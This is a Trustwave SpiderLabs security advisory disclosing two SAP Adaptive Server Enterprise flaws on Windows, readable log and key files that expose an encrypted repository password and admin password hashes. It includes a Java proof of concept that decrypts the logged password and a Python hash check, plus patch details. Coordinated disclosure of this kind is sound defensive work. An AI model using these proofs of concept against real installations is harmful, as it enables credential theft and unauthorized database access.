Trustwave SpiderLabs Security Advisory TWSL2020-006: Multiple Vulnerabilities in SAP Adaptive Server Enterprise Published: 09/24/2020 Version: 1.0 Vendor: SAP (www.sap.com) Product: Adaptive Server Enterprise Versions affected: prior to 16.0 SP02 PL09 HF2 and 16.0 SP03 PL08 HF2. Product description: Relational database management system. Finding 1: Information Disclosure in SAP Adaptive Server Enterprise Credit: Martin Rakhmanov of Trustwave CVE: CVE-2020-6295 On Windows the ASE_Suite.log file is readable by any valid Windows user by default: C:\SAP>icacls C:\SAP\log\ASE_Suite.log C:\SAP\log\ASE_Suite.log NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files If Cockpit component is installed, then the log will contain encrypted repository password: DEBUG>>> 05-18-20 21:27:19 : ConfigCockpitLogins.writeRepositoryPassword(): write enRepoPwd=1-AAAAEgQQB+3Q7M42wx5KfB/vy2q4HfZhiEasqjA8vSjPIZbbLrqb9KZFqdpyTBHk7reqCIUzsXIlcMc/jaXtaW8eDvBIqQ== This together with weak permissions on csibootstrap.properties and csikeystore.jceks files allows password decryption by any valid Windows user. C:\SAP>icacls C:\SAP\COCKPIT-4\conf\csibootstrap.properties C:\SAP\COCKPIT-4\conf\csibootstrap.properties NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files C:\SAP>icacls C:\SAP\COCKPIT-4\conf\csikeystore.jceks C:\SAP\COCKPIT-4\conf\csikeystore.jceks NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files POC in Java: // javac.exe -cp . demo.java // Copy original files from SAP location to MY_COPY location // "C:\SAP\Shared\SAPJRE-8_1_060_64BIT\bin\java.exe" -Dcom.sybase.ua.home=C:\MY_COPY\COCKPIT-4\ -cp . demo public class demo { public static void main(String[] args) throws Exception { com.sybase.ua.security.crypto.CSIEncryption.bootstrapCSI(); String password = com.sybase.ua.security.crypto.CSIEncryption.getInstance().getEncryptionTools().decrypt("1-AAAAEgQQB+3Q7M42wx5KfB/vy2q4HfZhiEasqjA8vSjPIZbbLrqb9KZFqdpyTBHk7reqCIUzsXIlcMc/jaXtaW8eDvBIqQ=="); System.out.println(password); } } Finding 2: Publicly readable ASE installation file contains SHA256 hashes of sccadmin and uafadmin passwords Credit: Martin Rakhmanov of Trustwave CVE: CVE-2020-6317 On Windows the ASE_Suite.log file is readable by any valid Windows user by default: C:\SAP>icacls C:\SAP\log\ASE_Suite.log C:\SAP\log\ASE_Suite.log NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files If Cockpit component is installed, then the log will contain SHA-256 hashes of special account passwords: ... DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write userName=sccadmin DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write encryptPwd={SHA-256:+EFnOPCybn0=}R2hjILOGw+9HuezqaOETTLEp3aES8tvgllXb8IL9W6E= DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write userName=uafadmin DEBUG>>> 05-18-20 21:27:18 : ConfigCockpitLogins.setCSIUserAndPassword(): write encryptPwd={SHA-256:63brIY/QONU=}zmVB11zcCmEvCw/DGoEY01O4y3E0VkFjQwIizR2h6j4= ... This allows brute force attacks on the accounts. Python POC for the sccadmin encryptPwd: >>> import hashlib, base64 >>> salt = base64.decodestring('+EFnOPCybn0=') >>> hash = hashlib.sha256() >>> hash.update(salt) >>> hash.update('ASE8Magic!') >>> base64.encodestring(hash.digest()) 'R2hjILOGw+9HuezqaOETTLEp3aES8tvgllXb8IL9W6E=\n' Remediation Steps: Apply the latest vendor supplied patches. Finding 1 was fixed in SAP ASE 16.0 SP02 PL09 HF2 and 16.0 SP03 PL08 HF2. Finding 2 was fixed in SAP ASE 15.7 SP 141 HF2, 15.7 SP 141 CE HF2, 16.0 SP02 PL09 HF2 and 16.0 SP03 PL08 HF2 Revision History: 05/20/2020 - Vulnerability disclosed to vendor 07/08/2020 - Patch released by vendor for SAP ASE 16.0 for CVE-2020-6295 and CVE-2020-6317 07/15/2020 - Patch released by vendor for SAP ASE 15.7 for CVE-2020-6317 09/24/2020 - Advisory published References 1. https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552603345 2. https://launchpad.support.sap.com/#/notes/2953203 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.